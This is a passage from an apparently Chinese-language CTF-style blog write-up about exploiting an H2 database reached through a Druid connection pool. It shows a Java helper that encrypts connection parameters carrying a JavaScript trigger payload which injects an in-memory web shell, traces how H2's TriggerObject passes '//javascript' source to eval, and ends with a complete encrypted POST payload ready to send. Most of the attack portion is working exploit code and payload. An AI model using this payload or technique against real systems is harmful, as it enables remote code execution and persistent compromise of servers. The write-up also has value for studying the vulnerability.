AIALA==\"),org.springframework.util.ClassUtils.getDefaultClassLoader()).newInstance().doInject()\n"+ "$$\n"
                    ,"root","admin","druid","10","10","1"};
            String type = paramsStr[0];
            String poolName = paramsStr[1];
            String driverClasses = paramsStr[2];
            String turl = paramsStr[3];
            String user = paramsStr[4];
            String password = paramsStr[5];
            String provider = paramsStr[6];
            String maxconn = paramsStr[7];
            String minconn = paramsStr[8];
            String usepool = paramsStr[9];
            String tmp_s = "";
            for (int i = 0; i < paramsStr.length; i++) {
                tmp_s+=paramsStr[i]+split_str;
            }
            System.out.println(tmp_s);
            out = SecurityHelper.encrypt("n3k0",tmp_s);
            System.out.println(out);
            out = SecurityHelper.encrypt("n3k0","mysql");
            System.out.println(out);
        }
    }

由于js代码不能有分号,我直接把那篇文章的js代码整成一行了。。。
然后就会一直运行payload里面的js代码,差点搞得电脑重启。。。debug整了半天,由于对druid不熟,不知道连接h2的细节。。。但是找到了漏洞点,在TriggerObject:

private Trigger loadFromSource() {
        SourceCompiler var1 = this.database.getCompiler();
        synchronized(var1) {
            String var3 = "org.h2.dynamic.trigger." + this.getName();
            var1.setSource(var3, this.triggerSource);

            Trigger var10000;
            try {
                if (SourceCompiler.isJavaxScriptSource(this.triggerSource)) {
                    var10000 = (Trigger)var1.getCompiledScript(var3).eval();//这里
                    return var10000;
                }
                ...

明显有个eval执行js代码。它是怎么进来的捏?

private synchronized void load() {
        if (this.triggerCallback == null) {
            try {
                Session var1 = this.database.getSystemSession();
                JdbcConnection var2 = var1.createConnection(false);
                Object var3;
                if (this.triggerClassName != null) {
                    var3 = JdbcUtils.loadUserClass(this.triggerClassName).getDeclaredConstructor().newInstance();
                } else {
                    var3 = this.loadFromSource();//这里
                }
                ...

然后我找了半天,还是不知道这个load是怎么进来的。在下面这行代码之后直接进到load了:

public ResultWithGeneratedKeys update(Object var1) {
        this.recompileIfRequired();
        this.setProgress(5);
        this.start();
        this.session.setLastScopeIdentity(ValueNull.INSTANCE);
        this.prepared.checkParameters();
        Object var2;
        if (var1 != null && !Boolean.FALSE.equals(var1)) {
            if (this.prepared instanceof DataChangeStatement && this.prepared.getType() != 58) {
                var2 = this.executeUpdateWithGeneratedKeys((DataChangeStatement)this.prepared, var1);
            } else {
                var2 = new WithKeys(this.prepared.update(), this.session.getDatabase().getResultFactory().create());
            }
        } else {
            var2 = ResultWithGeneratedKeys.of(this.prepared.update());//这里
        }
        ...

然后prepared是payload里面init=后面的值。

private static boolean isJavascriptSource(String var0) {
        return var0.startsWith("//javascript");
    }

上面这行代码根据前缀判断是否为js代码,然后最后直接eval。讲道理还是挺蒙的。但是又学了一手新姿势写内存马,太nb了
最终payload:post

operation=aN/9WhvoOLU%3d24Ve7b7Py0RB3XVCS%2bCtug%3d%3d&params=aN/9WhvoOLU%3d9bhN7FeEb4ZgpJe7f85ZXdfIf4tDAhlt0TzFmAeOJxVPcFpt9Dz02YhvE4uvDt/vEvY3MZxmRLD7BQxaw%2buc7jlnrM9ixVDg1zT0itdHUhYZsspGx5KmOSpnNXWoAEsVpic7Qh6exaIP2/znEZC3kP643GtK/ZIxLs0rNcxRPjIrjMwcaURT4ue2qBMX7RGO/sG1ddpemBdvr192CYZeXPyIQoFvmG0yKsSm3pQvx1CY6wIQWeJxvRg65a5Hak09Wmm6cjSTuXqg0nYWDaf/mzZU9QQvcywqJIcgmM2Rpk4dXhhp7yGIJsA%2bHi70j%2bQ3fxY8PW6bhuLxSnE0z98UpbrmjuaD2m0ygdqfSNjOGVW4B1Tw/OMVb8XoZm7SpvkOqT6vevSx%2b%2bSI%2b%2b6V0QIOwSoQRpSqMtGFz1TeE0d2NDPnnh%2bLj7z%2bt6ghnH2YusFf2DN9m8AaA6TEZa/gZer47g5mut4CGV0Tm8rzVB9L8ENLWdhMH%2bJ7%2bVk5o5XEKvpmAcbcc/%2b%2bfnHqV6lEXIr/ojcttHMuZdTZke0IkFC52/VE5yNSJ940pyJU05PA5N7YLbvgownivob4wF1SG8JpIB3YeT5oUC0rmmcyaYCB29lJZTYO0YexAXdDxajZIiIvPnKLLK3sKOI%2btRHBx5q%2blk9m5mZubpcwxjq7mOr1%2bMY7dJgfVwSiZxBKx6Ed%2bdmR/%2bPvDwqyQbBnUitK4GY9iMT2oo9JdptZkTcnt7W%2b9g%2b0KlEFd0TMGiXnYlKxq5kjqDQgKxEG2Xcnq7zw%2begn4m4lKx30rdNjPkFgze9dXk/awQREasFtfUGihgLqH%2bOC5G/nJwoMOu4DNhWA3qpc5rBoZ%2bjnBmwd81piMMl2DO/ofAjf3qBgwF353ZW890zfVD0P5uqZhKt1voFJJL23DeRd7ZxU9w39DTpmb52H/IXJ%2b58nfslrV%2bqPMxOhnqYhhouWE70Pbk91Nzq3iBIcyco4YEP0F5l4GSauFW47xviDMX56haaor/AWt0WywFPa7yOeB0PASQ4y9P6GN2y1K0B0/2WwDwM06Pf0UXGVNBCEmdeCDJ9hBQdBl/u3M3PXho26msCCUjf5GKKx9pw8ZfYpAMRHaGBfDzmmPMnCXD28K4tfoQuq5rvzlLZMPRcho20Q1eA8bW/1oNTL68A6ChYIhxIIVHbD48d%2bbObOVYPzkGMRCXZRkza2zCzr3pyiSAtRjPUnGyBpwfTjfAlDt5Qb1ZASrMBcR9jFP5ar/pFKWCTw%2b2Y1p7GmWhot9FrUyPvXJIj6WkXOi3a2%2bKHInGIg2Xy0BHRBjpdBk1n4DH%2bHcTfBbRZxNBqmlvMjB7GLGV5oUaB0N8lbt2ZNndsx9LZYIaqVrlhIAwQ6l8m%2bJm7cViE%2bmmkjRbk8jAX336COZacN84DfP6mgNYIJ8///pajXFQyK6pZUVxMRbXdv8gose/c6IZMyBOpJNgR3D/LIWbHCq4cPoCosWTrvzcKcRwJyCJzoJXyOYTNFOsanM2gCQBHv%2bc50Gzby9PUIALZBL3/TTEuvoJK/XggP9c7SzlJgTANM/NBtketblPOx6h18v1MYpiR4R5uKKe63B6GIdqYXMAvuU%2bvDW4xEeBrEztnRsPKE4dV8CkQjxZEVCtyQ1xedHP718ttbW/E8tQ76mFZZCK9FsV73JQV7du4fhzcFId4lfHOrRa03m%2bDgecrtcHv%2bHE6g1fXm57unbWMTR6QYg95DnPhkMhjb%2bbSOBYAwITHYXmw3wSmU739jJynZN/uVY%2bJ5mIOj2HuUOFBgde1EbMXcmf7m4tnGqkrBrA5VU7WsCOPUzSO3eoTGHOHIcasBAPLMIfNy44clRa/jheML3SdFnWCulSBPm1F3SvqE3WSSF9rVsJjgB86bQF5ASoPxXk%2b25a7hgi%2b5aeYaj9roUafIsWxEl2BRGcHunOPOhRqYEDr3GoVpAe2O7X09Qoj/vgz3guFwotSglrUF/WhySYScwZQ4DU2V3W3pfhRUi0GgJAUPVBEBInJfEytswgFsSqd6nqm7TkJ/Z5lkCIRXa8ltfn0a4tI3P3ZInzFkdRKliPpQAo6miMp3V7ID%2bfHy/ljWZIzmFEEgLxbontMxsX%2bAwpBsedOgaOXopaToPfZr%2bDyuT1wqp2je6pLvxlP1PSuZx6PY2X61ujzziATBhXL5agSX3xieHbonNnFvRANsLpmHjXGuTMyElLCwg6XiQPUzDKLiFFaQNTTO11IS/xa/XoGP0DFB2xvcRgzZ0cWH0K0SSXcI8FCBH7AFPz4EsRMO2sba%2bKOHtUDNBkjXu/H4kQfDzjfaN5pGjyAbWS%2bRVYbCKiYySsVTqB1Ql4lJjzu6VliBwzH/CornUZf8hMmh3JeoqUNgJdpyTMAoSMRjS1iv52Q59fSIapThOSWuuh2b2Xshz6%2bcSdaZaVGE4E6SXlo5Q1vebhHNLKMigN1LLJ1EudZjliFQjGBzYx6kM7lPIRalES75UGBdy6FAq7NVHZgVYaskHX7iANrFPIAWVKbNrsyv0qG4WWXS5ZFeSaSUsB1KP4BQi6T6cATH7u0KAdD206kB7C1TDZWhCpIRwVTONDZBqOxvFszDs6%2bnci/Qs8rGZ5KK/Vir1h90pCFlZmWRtaO63ihfbTLvsIKwcsTscwGG40shR8SER5kPwqtQ9kDw3QVrqWirohBwRF7nFevQUeugL6m9o7lqkN9QZOc8EQQJE/%2btl178Vi/EtXHHjOCSBEid5E%2bwoceNkkKlJ50izbOqequpjojyO5w1SABR4FzoW%2bY2lg6O%2bmAJp9HihQfrFETIencjJbdxLBeNZWhJFJZ%2bSrf0OwDMt/r3e91XoIoAZTOeo9yYMUqYHH75fb7FaaCX4YDu9CbI/WEVh7wNTXKk6PGZwh%2bBzs8QFQUeLnuT1pj64eQyy%2b2Owf0OvxcMnyTd9UWdy9gzr7mzw944%2b8GnyElwFpFpjPcJ6TYMtxYk/DcqG2YSOfSRtPL%2bxRM/3i87P7jqyXUql%2bVHFnUE0r4yn5bV2vxq%2bLoVUhMid6vR9HuyE80pAIvyzkHMuMVYsADlPv8tTsiPQMReIqF5o3cM83ntdb92Jb8kw/1aM2sioyzHG%2bOGAplrc7SsAR6%2bq/Lb2GFS18Pcwz8nGRdeyWvt7Wya05YpjNHRtaDt/MYKRIJqtlkKKO/EYF/3ZEDbEXtH%2b0xRpESsMiCjHzds/Smfte1ssGw/3bfms7O8zUuNCJ3exrEuKdDz2IaFwpjsTL9FA4ABUukd6j9FPgd2m9vCtpNTfuOYrpngzsH0DuC5Lku0jQHiHJDyE7AKNNuW/HD3k3VMNbp7S8BrAP89XncV/7vFg5PB5aY/CAtiLkOtuQnN7q6EHj03rQBQ7ZvFLtA0VIzaKX5k4q%2b2DA9onXTSsIVyouX%2beDgmOoTJYfv2QgQ350zeovzc3qpWdNPWttE9Af1w0PGdCh4uESg4DNVtVbsYPvKtLH70S2uxgpz3NYUrTOHzvSXyXSxOTLHucok5fTDHtym6ee00z8inB%2bI%2bWD36oqrqN5A1pI02v0xagW8dvavnkytyeSEz8rfhtGk19lNsHxyveEFK43GCpu7pZjOL%2bhojrs8Bh8KMOmJuGmdljIWXSr5mep7zUDfaXWqkH3te/XHqU3APniEThfivwpgnR7scCMwFdkPgA9BcDk41ZJM4N507tETc6GjfHO8WfJuATiNM76YiHTV11LpeDwTPhFqJ550QeL7tSY2HDy8lsyBcrcMwhB5%2bViaeCjwWKxSvCCEDbP2ePpuGvQEK0QeJFslI6PFyHpmN//wcMYSSmbS1MrqSwv6k29T2fVlFteIn2QPCUQ%2bcFrZONWCvIINcuF5rEY2EpcYyX0LOkBm%2b3wiHHEQILDD0oNrrCt8xTUYbQi3OeEXYSddxICnaLWzqGzrl3YQwJigZEfE05BCTvNOchOI0lFhzi%2besMhFavyyViaAhEnbtyBCrBEN5AO8Oiobx0EOzGVKy8LIvvdI1DEeRoRn3bir18qCQZpM3c/8eKFOlJFUcq0bsgyFABdXg05Fobda0A4XdgRLFiptCSMQab89wDawXMz%2bCaC0lUuzYkziD%2bkrNZHaqIlOVJDFMkZow%3d%3d
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇